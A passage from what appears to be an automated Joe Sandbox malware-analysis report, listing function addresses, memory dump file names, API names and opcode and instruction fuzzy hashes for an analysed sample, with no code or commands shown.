                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0573f220e74faf396fde4ea8603e5dde270855247a7eee1de613847dba4102c5
                                                                                        • Instruction ID: e11fd5bb9dda8c165a19c7814bab56b07bb6052746c348a136678838594ebb16
                                                                                        • Opcode Fuzzy Hash: 0573f220e74faf396fde4ea8603e5dde270855247a7eee1de613847dba4102c5
                                                                                        • Instruction Fuzzy Hash: E9218EF7F60A2647F39808B8DDA9376558297A5325F2F83385F29A77C5DCAC4C091284
                                                                                        Function 007EC440 Relevance: .1, Instructions: 82COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: e1a0a449113572a10a77f00c691312fbe059fb77799c515431cda1b37a5dd08c
                                                                                        • Instruction ID: ca85c3acb913d8a169e7347341edc13761f15daea33dabb1a6da03f6482ffa2b
                                                                                        • Opcode Fuzzy Hash: e1a0a449113572a10a77f00c691312fbe059fb77799c515431cda1b37a5dd08c
                                                                                        • Instruction Fuzzy Hash: FD119E765083C89FD721AE55DC50977BBE6EBD9304F08843CE9C513251E23A9D219742
                                                                                        Function 00A5C188 Relevance: .1, Instructions: 79COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bb860ed9d300425bd8233718502af00ab73a873cab21b14dd7ea938b9f95ac3d
                                                                                        • Instruction ID: 39be791a244017a5460b6eb6153c7464d558a280a6fde61a360e2895acafde70
                                                                                        • Opcode Fuzzy Hash: bb860ed9d300425bd8233718502af00ab73a873cab21b14dd7ea938b9f95ac3d
                                                                                        • Instruction Fuzzy Hash: DC21F0B250C7049FE315BF29D886AAAFBE5EF58310F02092DE6D583650EB7168508A87
                                                                                        Function 008504CE Relevance: .1, Instructions: 79COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 55bb7afd138e09e68d01d8c093efa533aadd3ebbffce957b66b0c078fab3d1a7
                                                                                        • Instruction ID: 1ac3264d6d05369a2bee1a1acbfa2af5e418261b165256642a264318fb6b26fd
                                                                                        • Opcode Fuzzy Hash: 55bb7afd138e09e68d01d8c093efa533aadd3ebbffce957b66b0c078fab3d1a7
                                                                                        • Instruction Fuzzy Hash: 602126F7F60A3547F7984879CC98362618297E5315F2F82398E0CEB7C5E87D9C0A5284
                                                                                        Function 007E5410 Relevance: .1, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                        • Instruction ID: 17b15f75696f625095ea15175a7ef6bfbd8b8a95ad9000cf5869422ddeb42fc2
                                                                                        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                        • Instruction Fuzzy Hash: 5E112533A065D90EC3128D3D8400565BFE30AA723EB6D8399F4B89B2D2D6268DCA8350
                                                                                        Function 007DC0CD Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 01f10ef63025d853010bbcd235c1ddb8abbacb0ba491801d8f95867e39bd8927
                                                                                        • Instruction ID: 9c4cd2e11dc849995170a433615f08ab8680198714a8d495bce45e2d6217c023
                                                                                        • Opcode Fuzzy Hash: 01f10ef63025d853010bbcd235c1ddb8abbacb0ba491801d8f95867e39bd8927
                                                                                        • Instruction Fuzzy Hash: 8201282160D7518BD319CB699891327FBE2ABDA704F18945ED0CBD7310C528CD02874A
                                                                                        Function 007EE19A Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c58d02ebaa07ec1e1fea080d4339b4adfe33acf4ab0c07667cedffec637d70dd
                                                                                        • Instruction ID: f13f00f0c8a70f1d28c6c4ed864673e148b489c637e08a14a3dba3d71d0b49dd
                                                                                        • Opcode Fuzzy Hash: c58d02ebaa07ec1e1fea080d4339b4adfe33acf4ab0c07667cedffec637d70dd
                                                                                        • Instruction Fuzzy Hash: 0301D8752596908BD30C4E96E49073A7399FB8E301F18A82DC58157585C33C98128B4A
                                                                                        Function 007DD00D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 289COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID: !$0
                                                                                        • API String ID: 3664257935-301933775
                                                                                        • Opcode ID: 1189a14c2e03e33d76359297ff69926890f5b3ff588148c970a931e24a5c6e84
                                                                                        • Instruction ID: 8089f0fe5ca6fce70c99fb323ceddf2335f4613cfab82a8f1a00c8b6f01cb96d
                                                                                        • Opcode Fuzzy Hash: 1189a14c2e03e33d76359297ff69926890f5b3ff588148c970a931e24a5c6e84
                                                                                        • Instruction Fuzzy Hash: CB8147315083908AC7388B29885177ABFE2AFD6344F28866ED4D69B391D63C8D49C756